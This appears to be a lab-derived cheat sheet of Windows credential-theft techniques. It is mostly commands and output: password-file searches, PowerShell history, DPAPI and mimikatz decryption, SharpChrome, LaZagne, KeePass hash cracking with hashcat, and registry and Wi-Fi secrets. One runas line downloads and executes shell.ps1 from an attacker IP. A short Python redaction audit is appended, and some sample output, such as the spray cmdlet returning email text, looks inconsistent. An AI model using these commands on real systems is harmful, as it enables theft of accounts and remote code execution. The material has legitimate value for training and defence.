Credential Theft
Application Configuration Files
PS C:\mrci0x1> findstr /SIN /C:"password" *.txt *.ini *.cfg *.config *.xml
settings.xml:105:<password>Pr0xyadm1nPassw0rd!</password>
settings.xml:121:NOTE: You should either specify username/password OR
settings.xml:127:<password>repopwd</password>
C:\mrci0x1> dir /s /b C:\ | findstr /i "web.config"
C:\inetpub\wwwroot\web.config
C:\inetpub\site2\web.config
Dictionary Files
PS C:\mrci0x1> gc 'C:\Users\htb-student\AppData\Local\Google\Chrome\User Data\Default\Custom Dictionary.txt' | Select-String password
Password1234!
PS C:\mrci0x1> Get-ChildItem -Path C:\Users -Recurse -File -ErrorAction SilentlyContinue | Select-String -Pattern "password"
C:\Users\Public\Documents\settings.xml:105:<password>Pr0xyadm1nPassw0rd!</password>
C:\Users\Public\Documents\settings.xml:127:<password>repopwd</password>
Unattended Installation Files
C:\mrci0x1> dir /s /b C:\ | findstr /i "unattend.xml"
C:\Windows\Panther\unattend.xml
Decode Base64 (example)
PS C:\mrci0x1> [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String("bG9jYWxfNGRtaW5fcEBzcw=="))
local_4dmin_p@ss
PowerShell History Files
PS C:\mrci0x1> (Get-PSReadLineOption).HistorySavePath
C:\Users\htb-student\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
PS C:\mrci0x1> gc (Get-PSReadLineOption).HistorySavePath
dir
cd Temp
md backups
cp c:\inetpub\wwwroot\* .\backups\
Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://www.powershellgallery.com/packages/MrAToolbox/1.0.1/Content/Get-IISSite.ps1'))
. .\Get-IISsite.ps1
Get-IISsite -Server WEB02 -web "Default Web Site"
wevtutil qe Application "/q:*[Application [(EventID=3005)]]" /f:text /rd:true /u:WEB02\administrator /p:5erv3rAdmin! /r:WEB02
PS C:\mrci0x1> foreach($user in ((ls C:\users).fullname)){cat "$user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt" -ErrorAction SilentlyContinue}
dir
cd Temp
md backups
cp c:\inetpub\wwwroot\* .\backups\
Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://www.powershellgallery.com/packages/MrAToolbox/1.0.1/Content/Get-IISSite.ps1'))
. .\Get-IISsite.ps1
Get-IISsite -Server WEB02 -web "Default Web Site"
wevtutil qe Application "/q:*[Application [(EventID=3005)]]" /f:text /rd:true /u:WEB02\administrator /p:5erv3rAdmin! /r:WEB02
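The history above shows how a credential typed on a command line (the wevtutil /p: value) is persisted in ConsoleHost_history.txt for anyone who can read the profile. As an added example, not part of the original notes, the following Python audit scans history text for a few common inline-secret switches and returns a redacted report, so the exposed accounts can be rotated and the history file purged. The sample history is constructed from the lines above, and the pattern list is an assumption that covers only the switches shown on this page plus ConvertTo-SecureString -AsPlainText.

```python
import re
from typing import Dict, List

# Constructed sample, modelled on the ConsoleHost_history.txt output above
# (not a real capture). Raw string so the Windows paths keep their backslashes.
SAMPLE_HISTORY = r"""dir
cd Temp
md backups
cp c:\inetpub\wwwroot\* .\backups\
wevtutil qe Application "/q:*[Application [(EventID=3005)]]" /f:text /rd:true /u:WEB02\administrator /p:5erv3rAdmin! /r:WEB02
cmdkey /add:TERMSRV/SQL01 /user:inlanefreight\bob /pass:Str0ngP@ss123
$pw = ConvertTo-SecureString 'SuperS3cretPassword!' -AsPlainText -Force
Get-IISsite -Server WEB02 -web "Default Web Site"
"""

# Assumed indicator list: each regex captures the secret in a named group
# called "secret" so the same pattern can drive both detection and redaction.
SECRET_PATTERNS = [
    ("wevtutil /p:", re.compile(r"(?i)\s/p:(?P<secret>\S+)")),
    ("cmdkey /pass:", re.compile(r"(?i)\s/pass:(?P<secret>\S+)")),
    ("ConvertTo-SecureString -AsPlainText",
     re.compile(r"(?i)ConvertTo-SecureString\s+(?P<q>['\"])(?P<secret>.+?)(?P=q)")),
]

REDACTED = "<REDACTED>"


def scan_history(text: str) -> List[Dict[str, object]]:
    """Return one finding per (line, indicator) hit, never echoing the secret."""
    findings: List[Dict[str, object]] = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for label, pattern in SECRET_PATTERNS:
            match = pattern.search(line)
            if match is None:
                continue
            secret = match.group("secret")
            findings.append({
                "line": lineno,
                "indicator": label,
                "redacted": line.replace(secret, REDACTED),
            })
    return findings


def redact_history(text: str) -> str:
    """Produce a copy of the history with every matched secret masked.

    Suitable for attaching to a ticket or keeping as evidence of what was
    exposed, without copying the credential itself into another file.
    """
    out = []
    for line in text.splitlines():
        for _, pattern in SECRET_PATTERNS:
            line = pattern.sub(
                lambda m: m.group(0).replace(m.group("secret"), REDACTED), line
            )
        out.append(line)
    return "\n".join(out) + "\n"


if __name__ == "__main__":
    for finding in scan_history(SAMPLE_HISTORY):
        print(f"line {finding['line']}: {finding['indicator']}: {finding['redacted']}")
```

Run it against a real profile by reading the path returned by (Get-PSReadLineOption).HistorySavePath; every hit means the credential on that line should be treated as compromised and the history file cleared after the account is rotated.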
PowerShell Export-Clixml Credentials
Decrypt Credential (if same user/session)
PS C:\mrci0x1> $encryptedPassword = Import-Clixml -Path 'C:\scripts\pass.xml'
PS C:\mrci0x1> $decryptedPassword = $encryptedPassword.GetNetworkCredential().Password
PS C:\mrci0x1> $decryptedPassword
SuperS3cretPassword!
Advanced (if SYSTEM access)
mimikatz # dpapi::cred /in:C:\scripts\pass.xml
[DPAPI] Credential decrypted successfully: SuperS3cretPassword!
Network Share Enumeration by Snaffler
PS C:\mrci0x1> .\Snaffler.exe -s -o snaffler_output.txt -c domain.local -u username -p password
\\FILE01\users\bjones\passwords.txt
\\FILE01\backups\server.vhdx
\\FILE01\users\asmith\id_rsa
Manual File Content Searching
Basic Search (Command Prompt)
C:\mrci0x1> cd c:\Users\htb-student\Documents & findstr /SI /M "bob_adm" *.xml *.ini *.txt
stuff.txt
Detailed Search (Command Prompt)
C:\mrci0x1> findstr /si password *.xml *.ini *.txt *.config
stuff.txt:password: l#-x9r11_2_GL!
C:\mrci0x1> findstr /spin "password" *.*
stuff.txt:1:password: l#-x9r11_2_GL!
PowerShell Search
PS C:\mrci0x1> select-string -Path C:\Users\htb-student\Documents\*.txt -Pattern password
stuff.txt:1:password: l#-x9r11_2_GL!
File Extension Search
Using dir (Command Prompt)
C:\mrci0x1> dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
c:\inetpub\wwwroot\web.config
Using where (Command Prompt)
C:\mrci0x1> where /R C:\ *.config
c:\inetpub\wwwroot\web.config
Using PowerShell
PS C:\mrci0x1> Get-ChildItem C:\ -Recurse -Include *.rdp, *.config, *.vnc, *.cred -ErrorAction Ignore
Directory: C:\inetpub\wwwroot
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/25/2021 9:59 AM 329 web.config
Sticky Notes Database (plum.sqlite)
Locate Database
PS C:\mrci0x1> cd C:\Users\htb-student\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState
PS C:\mrci0x1> ls
15cbbc93e90a4d56bf8d9a29305b8981.storage.session
Ecs.dat
plum.sqlite
plum.sqlite-shm
plum.sqlite-wal
PowerShell — Extract Data Using PSSQLite
PS C:\mrci0x1> Set-ExecutionPolicy Bypass -Scope Process
PS C:\mrci0x1> Import-Module .\PSSQLite.psd1
PS C:\mrci0x1> $db = 'C:\Users\htb-student\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite'
PS C:\mrci0x1> Invoke-SqliteQuery -Database $db -Query "SELECT Text FROM Note" | Format-Table -Wrap
vCenter
root:Vc3nt3R_adm1n!
Linux — Extract Data Using strings
mrci0x1@htb$ strings plum.sqlite-wal
id=011f29a4-e37f-451d-967e-c42b818473c2 vCenter
id=ffaea2ff-b4fc-4a14-a431-998dc833208c root:Vc3nt3R_adm1n!
Other Sensitive Files (Manual Search)
PS C:\mrci0x1> Get-ChildItem -Path C:\Windows,C:\ProgramData,C:\Users -Recurse -Include *.log,*.sav,*.dat,*.evt -ErrorAction Ignore
Directory: C:\Windows\repair
sam
system
security
Cmdkey Saved Credentials
PS C:\mrci0x1> cmdkey /add:TERMSRV/SQL01 /user:inlanefreight\bob /pass:Str0ngP@ss123
PS C:\mrci0x1> cmdkey /list
Target: LegacyGeneric:target=TERMSRV/SQL01
Type: Generic
User: inlanefreight\bob
PS C:\mrci0x1> runas /savecred /user:inlanefreight\bob "powershell -c IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.3/shell.ps1')"
Browser Credentials with SharpChrome
PS C:\mrci0x1> .\SharpChrome.exe logins /unprotect
[*] Triaging Chrome Logins for current user
[*] AES state key file : C:\Users\bob\AppData\Local\Google\Chrome\User Data\Local State
[*] AES state key : 5A2BF178278C85E70F63C4CC6593C24D61C9E2D38683146F6201B32D5B767CA0
--- Chrome Credential ---
file_path,signon_realm,origin_url,date_created,times_used,username,password
C:\Users\bob\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://vc01.inlanefreight.local/,https://vc01.inlanefreight.local/ui,4/12/2021 5:16:52 PM,13262735812597100,bob@inlanefreight.local,Welcome1
KeePass Database Extraction
PS C:\mrci0x1> Get-ChildItem -Path C:\,\\FILE01\users -Recurse -Include *.kdbx -ErrorAction Ignore
C:\Users\bob\Documents\ILFREIGHT_Help_Desk.kdbx
mrci0x1@htb$ python2.7 keepass2john.py ILFREIGHT_Help_Desk.kdbx
ILFREIGHT_Help_Desk:$keepass$*2*60000*222*f49632ef7dae20e5a670bdec2365d5820ca1718877889f44e2c4c202c62f5fd5*2e8b53e1b11a2af306eb8ac424110c63029e03745d3465cf2e03086bc6f483d0*7df525a2b843990840b249324d55b6ce*75e830162befb17324d6be83853dbeb309ee38475e9fb42c1f809176e9bdf8b8*63fdb1c4fb1dac9cb404bd15b0259c19ec71a8b32f91b2aaaaf032740a39c154
mrci0x1@htb$ hashcat -m 13400 keepass_hash /opt/useful/seclists/Passwords/Leaked-Databases/rockyou.txt
$keepass$*2*60000*...:panther1
MailSniper Email Search
PS C:\mrci0x1> Import-Module .\MailSniper.ps1
PS C:\mrci0x1> Invoke-PasswordSprayMailSniper -UsersFile users.txt -PasswordFile passwords.txt -Domain inlanefreight.local -Server exchange01.inlanefreight.local
Subject: New Admin Credentials
Body:
Account: admin@inlanefreight.local
Password: Str0ngP@ss!
LaZagne Credential Extraction
PS C:\mrci0x1> .\lazagne.exe all
########## User: jordan ##########
------------------- Winscp passwords -----------------
[+] Password found !!!
URL: transfer.inlanefreight.local
Login: root
Password: Summer2020!
------------------- Credman passwords -----------------
[+] Password found !!!
URL: dev01.dev.inlanefreight.local
Login: jordan_adm
Password: ! Q A Z z a q 1
SessionGopher
PS C:\mrci0x1> Import-Module .\SessionGopher.ps1
PS C:\mrci0x1> Invoke-SessionGopher -Target WINLPE-SRV01
WinSCP Sessions
Source : WINLPE-SRV01\htb-student
Session : Default%20Settings
PuTTY Sessions
Source : WINLPE-SRV01\htb-student
Session : nix03
Hostname : nix03.inlanefreight.local
SuperPuTTY Sessions
Source : WINLPE-SRV01\htb-student
SessionName : NIX03
Host : nix03.inlanefreight.local
Username : srvadmin
Port : 22
AutoLogon Credentials
PS C:\mrci0x1> reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
AutoAdminLogon REG_SZ 1
DefaultUserName REG_SZ htb-student
DefaultPassword REG_SZ HTB_@cademy_stdnt!
PuTTY Proxy Credentials
PS C:\mrci0x1> reg query HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions
HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions\kali%20ssh
PS C:\mrci0x1> reg query HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions\kali%20ssh
ProxyUsername REG_SZ administrator
ProxyPassword REG_SZ 1_4m_th3_@cademy_4dm1n!
Wi-Fi Passwords
PS C:\mrci0x1> netsh wlan show profile
All User Profile : ilfreight_corp
PS C:\mrci0x1> netsh wlan show profile ilfreight_corp key=clear
Key Content : ILFREIGHTWIFI-CORP123908!